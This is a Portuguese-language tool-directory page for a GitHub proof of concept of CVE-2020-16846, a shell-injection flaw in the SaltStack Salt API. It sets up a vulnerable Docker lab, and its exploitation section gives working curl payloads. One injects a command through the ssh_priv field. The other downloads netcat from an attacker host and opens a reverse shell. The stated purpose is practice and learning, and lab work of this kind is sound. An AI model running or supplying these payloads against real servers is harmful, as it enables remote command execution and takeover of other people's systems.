Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-16846-Saltstack-Salt-API | Kitploit
Ferramentas/GitHubGitHub/zomy22/cve-2020-16846-saltstack-salt-api
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubzomy22/cve-2020-16846-saltstack-salt-api

CVE-2020-16846-Saltstack-Salt-API

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
há 4 anosAinda não revisado

CVE-2020-16846-Saltstack-Salt-API

Vulnerabilidade explicada: Um problema foi descoberto no SaltStack Salt até a versão 3002. O envio de requisições web especialmente elaboradas para a API do Salt, com o cliente SSH habilitado, pode resultar em injeção de shell. Os detalhes sobre esta vulnerabilidade podem ser encontrados aqui:

https://www.zerodayinitiative.com/blog/2020/11/24/detailing-saltstack-salt-command-injection-vulnerabilities

Para fins de prática e aprendizado, decidi criar uma instância vulnerável e explorá-la.

Versão vulnerável: https://github.com/saltstack/salt/releases/tag/v3002

Testado no Ubuntu 20.04.03

Instruções

Use o Dockerfile para criar uma instância vulnerável no Docker.

Execute o salt_setup.sh se quiser criar uma instância vulnerável em uma VM Ubuntu.

Construir a imagem

docker build -t salt-image .

Execute o container e exponha as portas (apenas a 8080 é realmente necessária para conseguir explorá-lo)

docker run -p4506:4506 -p4505:4505 -p8000:8000 -it salt-image:latest

api

Exploração

curl -i $salt_ip_addr:$salt_api_port/run -H "Content-type: application/json" -d '{"client":"ssh","tgt":"A","fun":"B","eauth":"C","ssh_priv":"|id>/tmp/test #"}'

reverse_shell

Shell reverso

root@kitploit:~
root@kali:~# curl -i $salt_ip_addr:$salt_api_port/run -H "Content-type: application/json" -d '{"client":"ssh","tgt":"A","fun":"B","eauth":"C","ssh_priv":"| /usr/bin/wget http://$attacker_ip/nc -O /root/nc; chmod +x /root/nc; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|/root/nc $attacker_ip $listener_port >/tmp/f  #"}'

pwned

Baixar ferramenta